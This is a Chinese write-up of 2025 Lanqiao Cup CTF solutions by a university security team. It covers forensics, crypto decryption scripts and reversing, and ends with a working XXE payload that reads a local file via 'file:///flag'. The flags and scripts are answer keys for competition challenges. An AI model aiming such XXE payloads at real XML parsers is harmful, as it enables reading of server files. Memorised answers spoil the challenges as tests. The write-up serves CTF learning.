2025蓝桥杯WP(LRT)
flowzip:
根据题目下载流量包,用流量分析软件打开
再通过追踪流查找http,一一排查最后找到flag
flag{c6db63e6-6459-4e75-bb37-3aec5d2b947b}
ezEvtx:
根据题目下载工具和文件
再通过日志筛选出警告信息
找到flag{confidential.docx }
Enigma:
打开附件,发现是用 CyberChef 做的一个密码学题目,打开 CyberChef 运行
得到
Flag{HELLOCTFERTHISISAMESSAGEFORYOU}
黑客密室逃脱:
日志中找到密文
Exp:
def decrypt_message(encoded_data, secret_key):
    """Undo a repeating-key additive cipher over a hex-encoded byte string.

    Every ciphertext byte has the code point of the matching key character
    subtracted from it; the key wraps around once its end is reached.

    Args:
        encoded_data: Ciphertext as a hex string.
        secret_key: Key text, cycled over the ciphertext bytes.

    Returns:
        The recovered text as a ``str``.
    """
    raw = bytes.fromhex(encoded_data)
    plain_chars = []
    for pos, cipher_byte in enumerate(raw):
        # Pick the key character for this position, cycling through the key.
        key_char = secret_key[pos % len(secret_key)]
        plain_chars.append(chr(cipher_byte - ord(key_char)))
    return ''.join(plain_chars)
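# Key and ciphertext as given in the write-up (the ciphertext was found in the
# challenge log). Substitute your own values to decrypt other data.
secret_key = 'secret_key4501'
# The assignment was split across two lines on the page, which is a
# SyntaxError; the parentheses keep the long literal on its own line.
encoded_data = (
    'd9d1c4d9e0d694d199dc6b96615eaaca98aa92a891ccc9a66c966697a09993a796d7c5d19bde6c9991ae'
)
print(decrypt_message(encoded_data, secret_key))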
得到
ShadowPhases:
用 ida64打开后,在这里打个断点
在弹出来的窗口随便输入点什么东西
运行到这个地方
得到 flag:flag{0fa830e7-b699-4513-801-51f35b0f3293}
easy_AES
正常AES,解密即可
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
from collections import defaultdict
from functools import reduce
from typing import List, Dict, Set, Tuple
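# Constants taken from the challenge.
# NOTE(review): the page printed this literal with the backslashes of its
# \xNN escapes stripped, which made it 108 bytes long -- not a multiple of the
# 16-byte AES block size, so decryption would fail. The backslashes are
# restored here, giving 48 bytes. The lone "r" is kept as a literal character;
# it may have been "\r" before extraction -- confirm against the challenge file.
CIPHER = b'6\xbf\x9b\xb1\x93\x14\x82\x9a\xa4\xc2\xaf\xd0L\xad\xbb5\x0e|>\x8c|\xf0^dl~X\xc7R\xcaZ\xab\x16\xbe r\xf6Pl\xe0\x93\xfc)\x0e\x93\x8e\xd3\xd6'
# Known 128-bit value; the search uses it both as the AES-CBC IV and as the
# per-nibble mask that is combined with GIFT.
KEY1_HEX = "74aeb356c6eb74f364cd316497c0f714"
# Leaked 128-bit value; the search treats each of its nibbles as
# (key0 nibble & key1 nibble).
GIFT = 64698960125130294692475067384121553664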
def split_to_nibbles(value: int, hex_str: str = None) -> List[int]:
    """Split a 128-bit integer or a hex string into 4-bit nibbles.

    When ``hex_str`` is non-empty it takes precedence and every hex digit
    becomes one nibble. Otherwise ``value`` is read as 128 bits and returned
    as 32 nibbles, most significant first.
    """
    if not hex_str:
        nibbles = []
        # Shifts 124, 120, ..., 0 walk the 32 nibbles from the top down.
        for shift in range(124, -4, -4):
            nibbles.append((value >> shift) & 0xF)
        return nibbles
    return [int(digit, 16) for digit in hex_str]
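def find_valid_keys() -> List[Tuple[str, str]]:
    """Search for key0 using GIFT and KEY1_HEX, then decrypt CIPHER with it.

    The search works nibble by nibble. At each position a key0 nibble ``x``
    is a candidate when ``x & key1_nibble == gift_nibble``. Every distinct
    key1 nibble value is mapped to one key0 nibble value, and no two key1
    values may share the same key0 value. Each complete mapping is tried as
    an AES-CBC key with KEY1_HEX as the IV.

    Returns:
        A list holding the first ``(key0_hex, plaintext)`` pair whose
        plaintext starts with ``flag{``, or an empty list if none is found.
    """
    # Nibble views of the two known 128-bit values.
    gift_nibbles = split_to_nibbles(GIFT)
    key1_nibbles = split_to_nibbles(0, KEY1_HEX)

    # Per position: the key0 nibbles consistent with the leaked AND result.
    possible_candidates = [
        [x for x in range(16) if (x & m) == b]
        for m, b in zip(key1_nibbles, gift_nibbles)
    ]

    # Positions grouped by the key1 nibble value that occurs there.
    position_map = defaultdict(list)
    for idx, nibble in enumerate(key1_nibbles):
        position_map[nibble].append(idx)

    # A key1 nibble value gets a single key0 nibble, so only values allowed
    # at every one of its positions survive.
    nibble_candidates = {
        nibble: reduce(
            lambda a, b: a & b,
            (set(possible_candidates[i]) for i in positions),
        )
        for nibble, positions in position_map.items()
    }

    # Depth-first search state.
    solutions = []
    visited = set()
    mapping = {}

    def backtrack(items: List[Tuple[int, Set[int]]]) -> bool:
        """Assign the remaining key1 nibbles; return True once a flag is found."""
        if not items:
            key0_hex = "".join(f"{mapping[nibble]:x}" for nibble in key1_nibbles)
            cipher = AES.new(bytes.fromhex(key0_hex), AES.MODE_CBC, bytes.fromhex(KEY1_HEX))
            # Kept outside the try so a ciphertext that is not block-aligned
            # still surfaces as an error instead of being read as "wrong key".
            raw = cipher.decrypt(CIPHER)
            try:
                plaintext = unpad(raw, 16)
            except ValueError:
                # A wrong key guess normally yields invalid padding; treat
                # it as a failed candidate so the search keeps backtracking
                # instead of aborting on the first miss.
                return False
            if plaintext.startswith(b"flag{"):
                solutions.append((key0_hex, plaintext.decode()))
                return True
            return False

        curr_nibble, candidates = items[0]
        for candidate in candidates - visited:
            mapping[curr_nibble] = candidate
            visited.add(candidate)
            if backtrack(items[1:]):
                return True
            # Undo the tentative assignment before trying the next value.
            visited.remove(candidate)
            del mapping[curr_nibble]
        return False

    # Most constrained nibbles first, to prune the search early.
    sorted_items = sorted(
        [(n, set(c)) for n, c in nibble_candidates.items()],
        key=lambda x: len(x[1])
    )

    if backtrack(sorted_items):
        return solutions
    return []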
if __name__ == "__main__":
    # Run the key search and print every recovered (key, plaintext) pair.
    found = find_valid_keys()
    if found:
        for key0_hex, plaintext in found:
            print(f"Found Key: {key0_hex}")
            print(f"Flag: {plaintext}")
flag值:flag{886769b5-2301-4c37-bb73-4480b4eab682}
星际XML解析器:
操作内容:
很正常的XML外部实体注入(XXE):解析器会解析外部实体,因此下面的 SYSTEM 实体被替换为本地文件内容;防御上,解析不可信 XML 时应禁用 DTD 和外部实体解析。
<?xml version="1.0"?>
<!-- The DTD below declares an external entity that points at a local file.
     A parser that resolves external entities substitutes the file content
     for the entity reference inside <foo>. Parsers that handle untrusted XML
     should have DTD and external-entity resolution disabled. -->
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "file:///flag" > ]>
<root>
<foo>&xxe;</foo>
</root>
flag值:
flag{a25134dd-f8fe-4187-9e73-27703fe98115}
文案|李何欢
排版|刘朋峻校正|潘瑶
审核|林炳辰
原文始发于微信公众号(凌日网络与信息安全团队):2025蓝桥杯WP(LRT)